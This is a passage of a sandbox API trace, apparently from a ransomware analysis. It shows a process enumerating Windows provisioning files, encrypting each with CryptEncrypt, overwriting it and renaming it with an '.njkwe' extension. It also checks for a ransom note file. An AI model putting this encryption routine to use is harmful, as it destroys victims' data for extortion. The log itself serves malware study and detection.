pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\255__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\255__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.718] GetProcessHeap () returned 0xbe0000 [0077.718] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.718] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909955a7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909955a7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909955a7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="256__C~1.PRO")) returned 1 [0077.718] lstrcmpiW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.718] lstrcmpiW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.718] lstrcmpiW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.718] lstrcmpiW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.718] lstrcmpiW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.718] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml") returned 170 [0077.718] StrStrIW (lpFirst="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.718] lstrcmpW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.719] lstrcmpW (lpString1="256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.719] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.719] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\256__connections_cellular_celcom malaysia (malaysia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.719] GetTickCount () returned 0x1153c3a [0077.719] GetTickCount () returned 0x1153c3a [0077.719] GetTickCount () returned 0x1153c3a [0077.719] GetTickCount () returned 0x1153c3a [0077.719] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.719] GetProcessHeap () returned 0xbe0000 [0077.719] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.719] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0077.721] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.721] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0077.721] GetProcessHeap () returned 0xbe0000 [0077.721] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.721] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.721] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.721] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.721] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.721] CloseHandle (hObject=0x43c) returned 1 [0077.721] GetProcessHeap () returned 0xbe0000 [0077.721] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.721] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0077.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\256__connections_cellular_celcom malaysia (malaysia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\256__Connections_Cellular_Celcom Malaysia (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\256__connections_cellular_celcom malaysia (malaysia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.722] GetProcessHeap () returned 0xbe0000 [0077.722] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.722] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909bb812, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909bb812, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909bb812, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x280, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="257__C~1.PRO")) returned 1 [0077.722] lstrcmpiW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.722] lstrcmpiW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.722] lstrcmpiW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.722] lstrcmpiW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.722] lstrcmpiW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.722] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml") returned 159 [0077.722] StrStrIW (lpFirst="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.722] lstrcmpW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.722] lstrcmpW (lpString1="257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.722] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.722] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\257__connections_cellular_digi (malaysia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.723] GetTickCount () returned 0x1153c3a [0077.723] GetTickCount () returned 0x1153c3a [0077.723] GetTickCount () returned 0x1153c3a [0077.723] GetTickCount () returned 0x1153c3a [0077.723] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.723] GetProcessHeap () returned 0xbe0000 [0077.723] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.723] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.725] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.725] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.725] GetProcessHeap () returned 0xbe0000 [0077.725] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.725] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.725] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.725] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.725] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.725] CloseHandle (hObject=0x43c) returned 1 [0077.726] GetProcessHeap () returned 0xbe0000 [0077.726] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.726] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\257__connections_cellular_digi (malaysia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\257__Connections_Cellular_DiGi (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\257__connections_cellular_digi (malaysia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.726] GetProcessHeap () returned 0xbe0000 [0077.726] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.726] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909bb812, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909bb812, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909bb812, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x280, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="258__C~1.PRO")) returned 1 [0077.726] lstrcmpiW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.726] lstrcmpiW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.726] lstrcmpiW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.726] lstrcmpiW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.726] lstrcmpiW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.726] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml") returned 159 [0077.726] StrStrIW (lpFirst="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.727] lstrcmpW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.727] lstrcmpW (lpString1="258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.727] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.727] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\258__connections_cellular_digi (malaysia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.727] GetTickCount () returned 0x1153c3a [0077.727] GetTickCount () returned 0x1153c3a [0077.727] GetTickCount () returned 0x1153c3a [0077.727] GetTickCount () returned 0x1153c3a [0077.727] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.727] GetProcessHeap () returned 0xbe0000 [0077.727] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.727] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.729] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.729] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.729] GetProcessHeap () returned 0xbe0000 [0077.729] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.729] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.729] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.729] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.729] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.729] CloseHandle (hObject=0x43c) returned 1 [0077.729] GetProcessHeap () returned 0xbe0000 [0077.729] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.729] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\258__connections_cellular_digi (malaysia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\258__Connections_Cellular_DiGi (Malaysia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\258__connections_cellular_digi (malaysia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.730] GetProcessHeap () returned 0xbe0000 [0077.730] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.730] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909bb812, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909bb812, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909bb812, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="259__C~1.PRO")) returned 1 [0077.730] lstrcmpiW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.730] lstrcmpiW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.730] lstrcmpiW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.730] lstrcmpiW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.730] lstrcmpiW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.730] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml") returned 160 [0077.730] StrStrIW (lpFirst="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.730] lstrcmpW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.730] lstrcmpW (lpString1="259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.730] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\259__Connections_Cellular_Maxis (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\259__connections_cellular_maxis (malaysia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.730] GetTickCount () returned 0x1153c3a [0077.731] GetTickCount () returned 0x1153c3a [0077.731] GetTickCount () returned 0x1153c3a [0077.731] GetTickCount () returned 0x1153c3a [0077.731] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.731] GetProcessHeap () returned 0xbe0000 [0077.731] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.731] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.732] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.732] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.732] GetProcessHeap () returned 0xbe0000 [0077.733] HeapFree (in: hHeap=0xbe0000, 